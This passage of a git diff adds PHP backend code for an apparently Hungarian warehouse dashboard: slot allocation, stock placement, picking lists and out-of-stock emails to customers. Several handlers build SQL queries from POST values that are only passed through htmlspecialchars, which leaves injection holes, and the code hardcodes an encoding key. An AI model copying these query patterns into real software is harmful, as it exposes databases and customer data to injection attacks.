pazarlás számolás + usort($candidates, function($a, $b) use ($amount_left) { + $a_enough = $a['capacity_left'] >= $amount_left; + $b_enough = $b['capacity_left'] >= $amount_left; + + if ($a_enough && !$b_enough) return -1; + if (!$a_enough && $b_enough) return 1; + + $distCmp = $a['distance'] <=> $b['distance']; + if ($distCmp !== 0) return $distCmp; + + if ($a_enough && $b_enough) { + return $a['capacity_left'] <=> $b['capacity_left']; + } + + return $b['capacity_left'] <=> $a['capacity_left']; + }); + + + foreach ($candidates as $c) { + if ($amount_left <= 0) break; + + $exists = false; + foreach ($WeHaveToPlaceHere as $existing) { + if ($existing['warehouse_id'] == $c['warehouse_id'] && $existing['position'] == $c['position']) { + $exists = true; + break; + } + } + if ($exists) continue; + + $can_place = min($amount_left, $c['capacity_left']); + $WeHaveToPlaceHere[] = [ + 'warehouse_id' => $c['warehouse_id'], + 'position' => $c['position'], + 'placed' => $can_place, + 'size' => $c['size'] + ]; + $amount_left -= $can_place; + } + + } + } + + + /* + -------------------- + A legközelebbi még nem teli polcra ajánlja + --------------------*/ + if ($amount_left > 0) { + function candidate_exists($candidates, $warehouse_id, $position) { + foreach ($candidates as $c) { + if ($c['warehouse_id'] === $warehouse_id && $c['position'] === $position) { + return true; + } + } + return false; + } + + foreach ($sorted_warehouses as $wid) { + if (isset($warehouse_config[$wid]["location"]) && $warehouse_config[$wid]["location"] != $location && $location != "" && $location != "-1") continue; + if (isset($warehouse_config[$wid]["status"]) && $warehouse_config[$wid]["status"] != 1) continue; + if (!isset($warehouse_config[$wid])) continue; + if ($amount_left <= 0) break; + + $row = $warehouse_config[$wid]['row']; + $cols = $warehouse_config[$wid]['columns']; + $max_cap = $warehouse_config[$wid]['capacity']; + $GlobalSize = $warehouse_config[$wid]["SizeJSON"]['globalSize']; + + $candidates = []; + + for ($i = intval($warehouse_config[$wid]["multiitem_row"]); $i <= $row; $i++) { + for ($j = 1; $j <= $cols; $j++) { + $pos = "$i:$j"; + + //Ellenőrzés: Tettünk e már ide + if (candidate_exists($WeHaveToPlaceHere, $wid, $pos)) continue; + + // Ellenőrzés: Doboz mérete + $size_key = ($j - 1) . ':' . ($i - 1); + $slot_size = $warehouse_config[$wid]["SizeJSON"]['customSizes'][$size_key] ?? $GlobalSize; + if (!in_array($slot_size, $item_id_config["size"])) continue; + + // Ellenőrzés: 1 termék van a polcon? + $safe_pos = mysqli_real_escape_string($conn, $pos); + $sql = mysqli_query($conn, "SELECT COUNT(wid), SUM(amount) FROM warehouse WHERE position = '$safe_pos' AND warehouse_id = '$wid' AND amount != 0"); + $sqlres = mysqli_fetch_array($sql); + + if ($sqlres[0] == 0) continue; + + // Ellenőrzés: kapacitás + $cap_left = intval($warehouse_config[$wid]["SizeJSON"]['customCapacity'][$size_key] ?? $warehouse_config[$wid]["SizeJSON"]['globalCapacity']) - $sqlres[1]; + if ($cap_left <= 0) continue; + + $dist = isset($existing_positions[$wid]) ? min_distance($i, $j, $existing_positions[$wid]) : 0; + + $candidates[] = [ + 'warehouse_id' => $wid, + 'position' => $pos, + 'capacity_left' => $cap_left, + 'distance' => $dist, + 'wid_count' => $sqlres[0], + 'size' => $slot_size + ]; + } + } + + usort($candidates, function($a, $b) use ($amount_left) { + if ($a['wid_count'] !== $b['wid_count']) { + return $a['wid_count'] <=> $b['wid_count']; + } + + $a_enough = $a['capacity_left'] >= $amount_left; + $b_enough = $b['capacity_left'] >= $amount_left; + + if ($a_enough && !$b_enough) return -1; + if (!$a_enough && $b_enough) return 1; + + $distCmp = $a['distance'] <=> $b['distance']; + if ($distCmp !== 0) return $distCmp; + + if ($a_enough && $b_enough) { + return $a['capacity_left'] <=> $b['capacity_left']; + } + return $b['capacity_left'] <=> $a['capacity_left']; + }); + + + foreach ($candidates as $c) { + if ($amount_left <= 0) break; + + $exists = false; + foreach ($WeHaveToPlaceHere as $existing) { + if ($existing['warehouse_id'] == $c['warehouse_id'] && $existing['position'] == $c['position']) { + $exists = true; + break; + } + } + if ($exists) continue; + + $can_place = min($amount_left, $c['capacity_left']); + $WeHaveToPlaceHere[] = [ + 'warehouse_id' => $c['warehouse_id'], + 'position' => $c['position'], + 'placed' => $can_place, + 'size' => $c['size'] + ]; + $amount_left -= $can_place; + } + } + + } + + /* + -------------------- + Végső simítások + --------------------*/ + $toplace = array(); + foreach ($WeHaveToPlaceHere as $place) { + $warehouse_id = $place["warehouse_id"]; + + $toplace[] = [ + "warehouse_loc" => $warehouse_config[$place["warehouse_id"]]["location"], + "warehouse_code" => $warehouse_config[$place["warehouse_id"]]["code"], + "warehouse_name" => $warehouse_config[$place["warehouse_id"]]["name"], + "warehouse_id" => $place["warehouse_id"], + "position" => $place["position"], + "placed" => $place["placed"], + "size" => $place["size"] + ]; + } + + usort($toplace, function ($a, $b) { + $loc_cmp = strcmp($a['warehouse_loc'], $b['warehouse_loc']); + if ($loc_cmp !== 0) return $loc_cmp; + + $name_cmp = strcmp($a['warehouse_name'], $b['warehouse_name']); + if ($name_cmp !== 0) return $name_cmp; + + list($a_row, $a_col) = explode(":", $a['position']); + list($b_row, $b_col) = explode(":", $b['position']); + + if ((int)$a_col === (int)$b_col) { + return (int)$a_row - (int)$b_row; + } + return (int)$a_col - (int)$b_col; + }); + + echo json_encode(["result" => "ok", "toplace" => $toplace, "amount_left" => $amount_left, "item_id" => $item_id]); + + } else if (htmlspecialchars($_POST["func"]) == "PlaceIntoWarehouse") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $placed = htmlspecialchars($_POST["placed"]); + $warehouse_id = htmlspecialchars($_POST["warehouse_id"]); + $position = htmlspecialchars($_POST["position"]); + $reason = htmlspecialchars($_POST["reason"]); + + $result = array(); + + $sql = mysqli_query($conn, "SELECT * FROM warehouse_structure WHERE warehouse_id = '$warehouse_id'"); + $WarehouseData = mysqli_fetch_array($sql); + + $sql = mysqli_query($conn, "SELECT sum(amount) as amount FROM warehouse WHERE position = '$position' AND warehouse_id = '$warehouse_id'"); + $intheloc = mysqli_fetch_array($sql); + + $sizeJSON = json_decode(base64_decode($WarehouseData["size"]), true); + + $capacity = intval($sizeJSON['globalCapacity']); + if (isset($sizeJSON['customCapacity'][intval(explode(':', $position)[1])-1 . ':' . intval(explode(':', $position)[0])-1])) { + $capacity = intval($sizeJSON['customCapacity'][intval(explode(':', $position)[1])-1 . ':' . intval(explode(':', $position)[0])-1]); + } + + if ($intheloc != null && $intheloc["amount"] != null) { + $freespace = $capacity - $intheloc["amount"]; + } else { + $freespace = $capacity; + } + + $sql = mysqli_query($conn, "SELECT size, item_id FROM pr_warehouse_parameters WHERE item_id = '$item_id'"); + $ItemSize = mysqli_fetch_array($sql); + + $LocSize = ''; + if (isset($sizeJSON['customSizes'][intval(explode(':', $position)[1])-1 . ':' . intval(explode(':', $position)[0])-1])) { + $LocSize = $sizeJSON['customSizes'][intval(explode(':', $position)[1])-1 . ':' . intval(explode(':', $position)[0])-1]; + } else { + $LocSize = $sizeJSON['globalSize']; + } + + if ($WarehouseData == null || $WarehouseData["status"] != 1) { + $result['result'] = "Nem létező, vagy inaktív raktárba szeretne betenni elemet!"; + } else if ($ItemSize == null || $ItemSize[0] == "") { + $result['result'] = "A megadott terméknek nem lett megadva dobozméret!"; + } else if ($freespace < $placed) { + $result['result'] = "A kijelölt helyen nincsen elegendő hely!"; + } else { + $item_id = $ItemSize['item_id']; + $sql = mysqli_query($conn, "SELECT wid, amount FROM warehouse WHERE item_id = '$item_id' and warehouse_id = '$warehouse_id' and position = '$position'"); + $IsThereProduct = mysqli_fetch_array($sql); + if ($IsThereProduct != null) { + $newamount = $placed + $IsThereProduct[1]; + $wid = $IsThereProduct[0]; + $sql = mysqli_query($conn, "UPDATE warehouse SET amount = '$newamount' WHERE wid = '$wid'"); + } else { + $sql = mysqli_query($conn, "SELECT wid FROM warehouse WHERE amount = 0 LIMIT 1"); + $WeCanUpdateOld = mysqli_fetch_array($sql); + if ($WeCanUpdateOld != null) { + $wid = $WeCanUpdateOld[0]; + $sql = mysqli_query($conn, "UPDATE warehouse SET item_id = '$item_id', warehouse_id = '$warehouse_id', position = '$position', amount = '$placed' WHERE wid = '$wid'"); + } else { + $sql = mysqli_query($conn, "INSERT INTO warehouse(item_id, warehouse_id, position, amount) VALUES ('$item_id', '$warehouse_id', '$position', '$placed')"); + } + } + + $loggerclass->writeLogWarehouse(['reason' => 'Doboz elhelyezés', 'reason_code' => 1, + 'item_id' => $item_id, + 'from_place' => $reason, + 'to_place' => $WarehouseData['code'] . chr(64 + intval(explode(':', $position)[0])) . explode(':', $position)[1], + 'amount_left' => $placed, + 'amount_right' => $placed + ]); + + $result['result'] = "ok"; + + if ($reason != null && $reason != "") { + $reasonData = explode("#", $reason); + + if ($reasonData[0] == "Production") { + $validCategories = [ + 'classic' => 'production_classic', + 'injmold' => 'production_injmold', + 'sporty' => 'production_sporty', + 'boxing' => 'production_boxing' + ]; + + if (!array_key_exists($reasonData[1], $validCategories)) { + $result['result'] = "A termék elhelyezve a raktárban, de az indoklás nem került elmentésre!"; + } else { + $table = $validCategories[$reasonData[1]]; + $pr_id = htmlspecialchars($reasonData[2]); + + $sql = mysqli_query($conn, "SELECT db_revenue FROM $table WHERE pr_id = $pr_id"); + $db_revenue = mysqli_fetch_array($sql); + if ($db_revenue != null) { + $new_db_revenue = intval($placed) + intval($db_revenue[0]); + $sql = mysqli_query($conn, "UPDATE $table SET db_revenue = $new_db_revenue WHERE pr_id = $pr_id"); + } + } + } + + } + } + + echo json_encode($result); + + } + + + exit(); +} + +$WarehouseLocSelect = ''; +$query = "SELECT DISTINCT location FROM warehouse_structure ORDER BY location ASC"; +if ($result = $conn->query($query)) { + while ($warehouse = $result->fetch_assoc()) { + $WarehouseLocSelect = $WarehouseLocSelect.''; + } +} + +?> + + + + + + + Kezelőfelület + + + + +
    +
    +

    Title

    +
    +
    +
    +
    +
    +
    +
    +
    +
    + + + + +
    + +
    +
    + external-Storage-furniture-beshi-color-kerismaker +
    +
    Dobozos raktár
    +
    Dobozos raktárba tétel
    +
    + +
    +
    + external-foil-camping-flaticons-lineal-color-flat-icons-4 +
    +
    Fóliás raktár
    +
    Fóliás raktár szerkesztő
    +
    + +
    + + +
    +
    Dobozos raktár
    + +
    +
    +

    Cikkszám:

    + +
    +

    Mennyiség:

    + +
    +

    Raktárhely:

    + +
    +

    :

    + +
    +
    + +

    +
    Keressen optimális helyet, majd helyezze el a rendszer által ajánlott helyekre
    + + + +
    + + +
    +
    Fóliás raktár adatlekérő
    + +
    +
    +

    Cikkszám:

    + +
    +

    :

    + +
    +
    + +

    +
    Írja be a keresett cikkszámot és kérje le az adatokat
    + + + +
    + +


    + + +
    + + + + diff --git a/dashboard/wh_orders.php b/dashboard/wh_orders.php new file mode 100644 index 0000000..f9c2d76 --- /dev/null +++ b/dashboard/wh_orders.php @@ -0,0 +1,2911 @@ +real_escape_string($reason) . "%'"; + } + + if ($date !== '') { + $where .= " AND DATE(FROM_UNIXTIME(date_create)) = '$date'"; + } + + $countSql = "SELECT COUNT(DISTINCT CONCAT(reason, '|', DATE(FROM_UNIXTIME(date_create)))) FROM warehouse_reservation $where"; + $countRes = $conn->query($countSql); + $totalReasons = $countRes->fetch_row()[0]; + $maxpage = ($totalReasons > 0) ? ceil($totalReasons / $maxperpage) : 1; + if ($cpage < 1 || $cpage > $maxpage) { + $cpage = 1; + } + $offset = ($cpage - 1) * $maxperpage; + + $orderbySQL = 'ORDER BY reason ASC, DATE(FROM_UNIXTIME(date_create)) ASC'; + switch ($orderby) { + case 'CBA': + $orderbySQL = 'ORDER BY reason DESC, DATE(FROM_UNIXTIME(date_create)) ASC'; + break; + + case 'FIRST': + $orderbySQL = 'ORDER BY DATE(FROM_UNIXTIME(date_create)) ASC, reason'; + break; + + case 'LAST': + $orderbySQL = 'ORDER BY DATE(FROM_UNIXTIME(date_create)) DESC, reason'; + break; + + case 'ABC': + default: + $orderbySQL = 'ORDER BY reason ASC, DATE(FROM_UNIXTIME(date_create)) ASC'; + break; + } + + $sql_reasons = "SELECT DISTINCT reason, DATE(FROM_UNIXTIME(date_create)) as order_date FROM warehouse_reservation $where $orderbySQL LIMIT ? OFFSET ?"; + + $stmt1 = $conn->prepare($sql_reasons); + $stmt1->bind_param('ii', $maxperpage, $offset); + $stmt1->execute(); + $res1 = $stmt1->get_result(); + + $reason_date_combinations = []; + while ($row = $res1->fetch_assoc()) { + $reason_date_combinations[] = [ + 'reason' => $row['reason'], + 'order_date' => $row['order_date'] + ]; + } + + if (empty($reason_date_combinations)) { + echo json_encode([ + 'result' => 'ok', + 'cpage' => $cpage, + 'maxpage' => $maxpage, + 'data' => [] + ], JSON_UNESCAPED_UNICODE|JSON_NUMERIC_CHECK); + exit; + } + + $conditions = []; + $bind_params = []; + foreach ($reason_date_combinations as $combo) { + $conditions[] = "(reason = ? AND DATE(FROM_UNIXTIME(date_create)) = ?)"; + $bind_params[] = $combo['reason']; + $bind_params[] = $combo['order_date']; + } + + $sql_items = " + SELECT reason, reserv_id, item_id, amount, date_create, taken_out, + DATE(FROM_UNIXTIME(date_create)) as order_date + FROM warehouse_reservation + WHERE $is_active + AND (" . implode(' OR ', $conditions) . ") + $orderbySQL, item_id + "; + + $stmt2 = $conn->prepare($sql_items); + $types = str_repeat('s', count($bind_params)); + $stmt2->bind_param($types, ...$bind_params); + $stmt2->execute(); + $res2 = $stmt2->get_result(); + + $data = []; + while ($row = $res2->fetch_assoc()) { + $key = $row['reason'] . '|' . $row['order_date']; + $item_id = $row['item_id']; + $amount = intval($row['amount']); + + if (!isset($data[$key])) { + $data[$key] = [ + 'megrendelo' => $row['reason'] . ' ' . str_replace('-', '. ', $row['order_date']) . '.', + 'rendelesek' => [] + ]; + } + + $found = false; + foreach ($data[$key]['rendelesek'] as &$rendeles) { + if ($rendeles['cikkszam'] === $item_id) { + $rendeles['mennyiseg'] += $amount; + $rendeles['total_taken'] += intval($row['taken_out']); + $found = true; + break; + } + } + unset($rendeles); + + if (!$found) { + $data[$key]['rendelesek'][] = [ + 'cikkszam' => $item_id, + 'mennyiseg' => $amount, + 'total_taken' => intval($row['taken_out']), + 'levetel' => $coderclass->encode($row['reason'] . '|' . $row['order_date'], "SZ4TUN4") + ]; + } + } + + $instock = []; + + $hidden = 0; + + foreach ($data as $index => &$megrendelo) { + $OrderCount = 0; + $InsufficientStockCount = 0; + + $hasInProcess = false; + + foreach ($megrendelo['rendelesek'] as &$rendeles) { + $item_id = $rendeles['cikkszam']; + $required_amount = $rendeles['mennyiseg']; + $taken_amount = $rendeles['total_taken']; + $remaining_amount = $required_amount - $taken_amount; + + if ($rendeles['total_taken'] > 0) { + $hasInProcess = true; + } + + if (!isset($instock[$item_id])) { + $sql = mysqli_query($conn,"SELECT saleable_quantity FROM statistics_daily WHERE item_id = '$item_id'"); + $result = mysqli_fetch_array($sql); + if ($result == null) { + $sql = mysqli_query($conn, "SELECT SUM(amount) AS total_amount FROM warehouse WHERE item_id = '$item_id' GROUP BY item_id"); + $result = mysqli_fetch_array($sql); + } + $instock[$item_id] = $result ? intval($result[0]) : 0; + } + + $available_stock = $instock[$item_id]; + $free_space = $available_stock - $remaining_amount; + + $OrderCount++; + + if ($free_space < 0) { + $InsufficientStockCount++; + $shortage = abs($free_space); + if ($is_active != "is_active = 0") { + $rendeles['cikkszam'] .= ""; + } + } + } + unset($rendeles); + + if ($hasInProcess && $is_active != "is_active = 0") { + $megrendelo['megrendelo'] .= ""; + } + + $hasInsufficientStock = false; + if ($InsufficientStockCount != 0) { + $hasInsufficientStock = true; + } + + if ($hasInsufficientStock && $hasInProcess && $is_active != "is_active = 0") { + if ($InsufficientStockCount == $OrderCount) { + $megrendelo['megrendelo'] .= ""; + if (!in_array($fulfill, ['ALL', 'NOFULFILL'])) { + unset($data[$index]); + $hidden++; + } + } else { + $megrendelo['megrendelo'] .= ""; + if (!in_array($fulfill, ['ALL', 'PARTFULFILL'])) { + unset($data[$index]); + $hidden++; + } + } + } else if ($hasInsufficientStock && $is_active != "is_active = 0") { + if ($InsufficientStockCount == $OrderCount) { + $megrendelo['megrendelo'] .= ""; + if (!in_array($fulfill, ['ALL', 'NOFULFILL'])) { + unset($data[$index]); + $hidden++; + } + } else { + $megrendelo['megrendelo'] .= ""; + if (!in_array($fulfill, ['ALL', 'PARTFULFILL'])) { + unset($data[$index]); + $hidden++; + } + } + } else if (!$hasInsufficientStock && !$hasInProcess && $is_active != "is_active = 0") { + $megrendelo['megrendelo'] .= ""; + if (!in_array($fulfill, ['ALL', 'CANFULFILL'])) { + unset($data[$index]); + $hidden++; + } + } + + } + unset($megrendelo); + + $output = array_values($data); + + header('Content-Type: application/json; charset=utf-8'); + echo json_encode([ + 'result' => 'ok', + 'cpage' => $cpage, + 'maxpage' => $maxpage, + 'is_active' => $return_is_active, + 'hidden' => $hidden, + 'data' => $output + ], JSON_UNESCAPED_UNICODE|JSON_NUMERIC_CHECK); + + + } else if (htmlspecialchars($_POST["func"]) == "Generatepicking_list") { + require_once __DIR__ . '/../managers/OrderProcessor.php'; + + // Input adat előkészítése + $inputData = []; + + // Manual pick feldolgozása + $manualPickRaw = $_POST["manual_pick"] ?? ""; + + if ($manualPickRaw !== "") { + $tmp = json_decode($manualPickRaw, true); + if (is_array($tmp)) { + $manualPick = []; + + foreach ($tmp as $row) { + if (!isset($row["item_id"], $row["amount"], $row["primary_source"], $row["amount_type"])) { + continue; + } + + $itemId = htmlspecialchars(str_replace(' ', '+', trim($row["item_id"]))); + $amt = intval($row["amount"]); + $primarySource = intval(trim($row["primary_source"])); + $amountType = intval(trim($row["amount_type"])); + + if ($itemId === "" || $amt <= 0) { + continue; + } + + $manualPick[] = [ + "item_id" => $itemId, + "amount" => $amt, + "primary_source" => $primarySource, + "amount_type" => $amountType + ]; + } + + if (!empty($manualPick)) { + $inputData['manual'] = $manualPick; + } + } + } + + // Reason mód (ha nem manual) + if (empty($inputData) && isset($_POST['reason'])) { + $inputData['reason'] = $_POST['reason']; + } + + // Generálás + $result = PickingListGenerator::generate($conn, $inputData, $coderclass); + + // JSON kiírás + echo json_encode($result, JSON_UNESCAPED_UNICODE | JSON_NUMERIC_CHECK); + } else if (htmlspecialchars($_POST["func"]) == "RemoveFromWarehouse") { + require_once __DIR__ . '/../managers/OrderProcessor.php'; + + $inputData = [ + 'wid' => $_POST['wid'] ?? '', + 'amount' => $_POST['amount'] ?? '', + 'item_id' => $_POST['item_id'] ?? '', + 'corrigate' => $_POST['corrigate'] ?? 'false', + 'overal_order_id' => $_POST['overal_order_id'] ?? '', + 'reason' => $_POST['reason'] ?? '' + ]; + + $result = WarehouseRemover::remove($conn, $inputData, $coderclass); + + echo json_encode($result, JSON_UNESCAPED_UNICODE); + + /* LOG-olás */ + $amount = $_POST['amount'] ?? '0'; + $amount_left = $amount; + $amount_right = $amount; + if (substr($amount, 0, 1) == "J") { + $amount_left = 0; + $amount_right = substr($amount, 1); + } else if (substr($amount, 0, 1) == "B") { + $amount_left = substr($amount, 1); + $amount_right = 0; + } + + $encoded = htmlspecialchars($_POST['reason'] ?? ''); + $to_place = $coderclass->decode($encoded, "SZ4TUN4"); + + $loggerclass->writeLogWarehouse(['reason' => 'Kivét rendelés miatt', 'reason_code' => 1, + 'item_id' => $_POST['item_id'], + 'from_place' => $_POST['tcHely'], + 'to_place' => $to_place, + 'amount_left' => intval($amount_left), + 'amount_right' => intval($amount_right) + ]); + + } else if (htmlspecialchars($_POST["func"]) == "Summarizepicking_list") { + $encoded = htmlspecialchars($_POST['reason'] ?? ''); + $is_active = intval(htmlspecialchars($_POST['is_active'] ?? 1)); + $decoded = $coderclass->decode($encoded, "SZ4TUN4"); + $parts = explode('|', $decoded); + if (count($parts) !== 2) { + echo json_encode(['result'=>'error','message'=>'Érvénytelen azonosító'], JSON_UNESCAPED_UNICODE); + exit; + } + $reason = $parts[0]; + $order_date = $parts[1]; + + $sql = " + SELECT + IFNULL(order_id,'') AS order_id, + IFNULL(order_name,'') AS order_name, + IFNULL(order_mail,'') AS order_mail, + item_id, + amount, + taken_out, + is_active + FROM warehouse_reservation + WHERE reason = ? + AND DATE(FROM_UNIXTIME(date_create)) = ? AND is_active = ? + ORDER BY order_name, order_id, item_id + "; + $stmt = $conn->prepare($sql); + $stmt->bind_param('ssi', $reason, $order_date, $is_active); + $stmt->execute(); + $res = $stmt->get_result(); + + $lists = []; + $is_active = null; + while ($r = $res->fetch_assoc()) { + $is_active = $r['is_active']; + $hasOrder = $r['order_id'] !== '' || $r['order_name'] !== '' || $r['order_mail'] !== ''; + if ($hasOrder) { + $key = $r['order_id'].'|'.$r['order_name'].'|'.$r['order_mail']; + $label = $r['order_name'].' - '.$r['order_id']; + } else { + $key = 'maradek'; + $label = '!&maradek&! '; + } + + if (!isset($lists[$key])) { + $lists[$key] = [ + 'overal_order_id' => $label, + 'picking_list' => [] + ]; + } + + if (intval($r['taken_out']) > 0) { + $lists[$key]['picking_list'][] = [ + 'wid' => 0, + 'item_id' => $r['item_id'], + 'amount' => intval($r['taken_out']) + ]; + } + + $remaining = intval($r['amount']) - intval($r['taken_out']); + if ($remaining > 0) { + $lists[$key]['picking_list'][] = [ + 'wid' => -1, + 'item_id' => $r['item_id'], + 'amount' => $remaining + ]; + } + } + $stmt->close(); + + $all = array_values($lists); + + echo json_encode([ + 'result' => 'ok', + 'is_active' => $is_active, + 'reason' => $reason, + 'date' => $order_date, + 'all_picking_lists' => $all + ], JSON_UNESCAPED_UNICODE|JSON_NUMERIC_CHECK); + + } else if (htmlspecialchars($_POST["func"]) == "CopyExcel") { + $encoded = htmlspecialchars($_POST['reason'] ?? ''); + $decoded = $coderclass->decode($encoded, "SZ4TUN4"); + $parts = explode('|', $decoded); + if (count($parts) !== 2) { + echo json_encode(['result'=>'error','message'=>'Érvénytelen azonosító'], JSON_UNESCAPED_UNICODE); + exit; + } + $reason = $parts[0]; + $order_date = $parts[1]; + + $sql = " + SELECT + IFNULL(order_id,'') AS order_id, + IFNULL(order_name,'') AS order_name, + IFNULL(order_mail,'') AS order_mail, + item_id, + amount, + taken_out, + is_active + FROM warehouse_reservation + WHERE reason = ? + AND DATE(FROM_UNIXTIME(date_create)) = ? + ORDER BY order_name, order_id, item_id + "; + $stmt = $conn->prepare($sql); + $stmt->bind_param('ss', $reason, $order_date); + $stmt->execute(); + $res = $stmt->get_result(); + + $lists = []; + $is_active = null; + while ($r = $res->fetch_assoc()) { + $is_active = $r['is_active']; + $hasOrder = $r['order_id'] !== '' || $r['order_name'] !== '' || $r['order_mail'] !== ''; + if ($hasOrder) { + $key = $r['order_id'].'|'.$r['order_name'].'|'.$r['order_mail']; + } else { + $key = 'maradek'; + } + + if (!isset($lists[$key])) { + if ($hasOrder) { + $lists[$key] = [ + 'order_id' => $r['order_id'], + 'order_name' => $r['order_name'], + 'order_mail' => $r['order_mail'], + 'picking_list' => [] + ]; + } else { + $lists[$key] = [ + 'order_id' => $label, + 'order_name' => $label, + 'order_mail' => $label, + 'picking_list' => [] + ]; + } + } + + if (intval($r['taken_out']) > 0) { + $lists[$key]['picking_list'][] = [ + 'wid' => 0, + 'item_id' => $r['item_id'], + 'amount' => intval($r['taken_out']) + ]; + } + } + $stmt->close(); + + $lists = array_filter($lists, function($list) { + return !empty($list['picking_list']); + }); + $all = array_values($lists); + + echo json_encode([ + 'result' => 'ok', + 'is_active' => $is_active, + 'reason' => $reason, + 'date' => $order_date, + 'all_picking_lists' => $all + ], JSON_UNESCAPED_UNICODE|JSON_NUMERIC_CHECK); + + } else if (htmlspecialchars($_POST["func"]) == "Closepicking_list") { + $mode = intval($_POST['mode']); + $encoded = htmlspecialchars($_POST['reason'] ?? ''); + $decoded = $coderclass->decode($encoded, "SZ4TUN4"); + $parts = explode('|', $decoded); + + if (count($parts) !== 2) { + echo json_encode(['result'=>'error','message'=>'Érvénytelen azonosító'], JSON_UNESCAPED_UNICODE); + exit; + } + + $reason = $parts[0]; + $order_date = $parts[1]; + + // 1. Lekérdezzük az eredeti rekordok reserv_id-jeit + $sql_orig = " + SELECT reserv_id + FROM warehouse_reservation + WHERE reason = ? + AND DATE(FROM_UNIXTIME(date_create)) = ? + AND is_active = 1 + "; + $stmt_orig = $conn->prepare($sql_orig); + $stmt_orig->bind_param('ss', $reason, $order_date); + $stmt_orig->execute(); + $res_orig = $stmt_orig->get_result(); + + $orig_ids = []; + while ($row = $res_orig->fetch_assoc()) { + $orig_ids[] = $row['reserv_id']; + } + $stmt_orig->close(); + + if ($mode === 0) { + // MODE 0: Csak eredeti rendelések lezárása + if (!empty($orig_ids)) { + $date_end = time(); + $placeholders = implode(',', array_fill(0, count($orig_ids), '?')); + $types = str_repeat('i', count($orig_ids)); + $sql_close = "UPDATE warehouse_reservation SET is_active = 0, date_end = $date_end WHERE reserv_id IN ($placeholders)"; + $stmt_close = $conn->prepare($sql_close); + $stmt_close->bind_param($types, ...$orig_ids); + $stmt_close->execute(); + $stmt_close->close(); + } + echo json_encode(['result'=>'ok','message'=>'Rendelések lezárva'], JSON_UNESCAPED_UNICODE); + } else { + + // MODE 1 és 2: Újrarendelés logika + $sql = " + SELECT item_id, order_id, order_name, order_mail, (amount - taken_out) AS remaining, receipt_method, note, primary_source, amount_type, note + FROM warehouse_reservation + WHERE reason = ? + AND DATE(FROM_UNIXTIME(date_create)) = ? + AND is_active = 1 + AND (amount - taken_out) > 0 + "; + $stmt = $conn->prepare($sql); + $stmt->bind_param('ss', $reason, $order_date); + $stmt->execute(); + $res = $stmt->get_result(); + + $new_reservations = []; + while ($row = $res->fetch_assoc()) { + $new_reservations[] = $row; + } + $stmt->close(); + + if (empty($new_reservations)) { + // Ha nincs újrarendelendő tétel, csak az eredeti rekordok lezárása + if (!empty($orig_ids)) { + $placeholders = implode(',', array_fill(0, count($orig_ids), '?')); + $types = str_repeat('i', count($orig_ids)); + $date_end = time(); + $sql_close = "UPDATE warehouse_reservation SET is_active = 0, date_end = $date_end WHERE reserv_id IN ($placeholders)"; + $stmt_close = $conn->prepare($sql_close); + $stmt_close->bind_param($types, ...$orig_ids); + $stmt_close->execute(); + $stmt_close->close(); + } + echo json_encode(['result'=>'ok','message'=>'Nincs újrarendelendő tétel, rendelések lezárva'], JSON_UNESCAPED_UNICODE); + } else { + // Beszúrjuk az újrarendelt tételeket + if ($order_date === date('Y-m-d', time())) { + $current_time = time() + 24 * 60 * 60; + } else { + $current_time = time(); + } + + $success_count = 0; + foreach ($new_reservations as $item) { + $sql_insert = " + INSERT INTO warehouse_reservation + (item_id, amount, taken_out, reason, date_create, is_active, order_id, order_name, order_mail, receipt_method, note, primary_source, amount_type) + VALUES (?, ?, 0, ?, ?, 1, ?, ?, ?, ?, ?, ?, ?) + "; + $stmt_insert = $conn->prepare($sql_insert); + + $savingReason = $reason; + + if ($item['order_name'] != "" && strpos($reason, " - ") === false) { + $savingReason .= " - ".$item['order_name']; + } + + $stmt_insert->bind_param( + 'sisisssssii', + $item['item_id'], + $item['remaining'], + $savingReason, + $current_time, + $item['order_id'], + $item['order_name'], + $item['order_mail'], + $item['receipt_method'], + $item['note'], + $item['primary_source'], + $item['amount_type'] + ); + if ($stmt_insert->execute()) { + $success_count++; + } + $stmt_insert->close(); + } + + // MODE 2: Email értesítés a hiányzókról + $sent_count = 0; + if ($mode === 2) { + $missing_items = []; + foreach ($new_reservations as $row) { + $email = trim($row['order_mail']); + if ($email !== '') { + if (!isset($missing_items[$email])) { + $missing_items[$email] = [ + 'name' => $row['order_name'], + 'order_id' => $row['order_id'], + 'items' => [] + ]; + } + $missing_items[$email]['items'][] = [ + 'item_id' => $row['item_id'], + 'remaining' => $row['remaining'] + ]; + } + } + if (!empty($missing_items) && file_exists(__DIR__ . '/../managers/mail.php')) { + require_once __DIR__ . '/../managers/mail.php'; + if (function_exists('sendFormattedEmail')) { + foreach ($missing_items as $email => $data) { + + $c_order_id = $data['order_id']; + $c_mail = $email; + $c_name = $data['name']; + $subject = "Rendelése nem teljesíthető - " . $c_order_id . " / Out of stock - ". $c_order_id; + + /* MAGYAR */ + + $content = "

    Kedves " . htmlspecialchars($c_name) . "!

    "; + $content .= "Köszönjük a rendelését!

    Sajnos az Ön által megrendelt légterelő jelenleg elfogyott, ezért most nem tudjuk feladni.
    A termék várhatóan néhány héten belül újra raktárra kerül."; + $content .= "

    Az alábbi tételek nem állnak rendelkezésre a(z) ". htmlspecialchars($c_order_id) . " rendelésből:

    "; + $content .= ""; + $content .= ""; + foreach ($data['items'] as $it) { + $content .= "" . ""; + } + $content .= "
    CikkszámHiányzó mennyiség
    " . htmlspecialchars($it['item_id']) . "" . $it['remaining'] . " db
    "; + $content .= "

    Kérjük, kattintással jelezze felénk, hogyan szeretne tovább haladni:

    "; + + $content .= 'Megvárom, amíg újra elérhető lesz
    '; + $content .= 'Kérem a rendelés törlését'; + + $content .= "

    Köszönjük megértését és türelmét!

    Üdvözlettel,
    Haluskai Csilla
    ügyfélkapcsolat

    "; + + /* ANGOL */ + + $content .= "
    "; + + $content .= "

    Dear " . htmlspecialchars($c_name) . "!

    "; + $content .= "Thank you for your order!

    Unfortunately, the wind deflector you ordered is currently out of stock, so we are unable to ship it right now.
    The product is expected to be available again in a few weeks."; + $content .= "

    The following items are not available from order no. ". htmlspecialchars($c_order_id) . ":

    "; + $content .= ""; + $content .= ""; + foreach ($data['items'] as $it) { + $content .= "" . ""; + } + $content .= "
    Item numberQuantity
    " . htmlspecialchars($it['item_id']) . "" . $it['remaining'] . " db
    "; + $content .= "

    Please click below to let us know how you would like to proceed:

    "; + + $content .= 'I’m happy to wait until it’s back in stock
    '; + $content .= 'I would like to cancel my order'; + + $content .= "

    Thank you for your understanding!

    Kind regards,
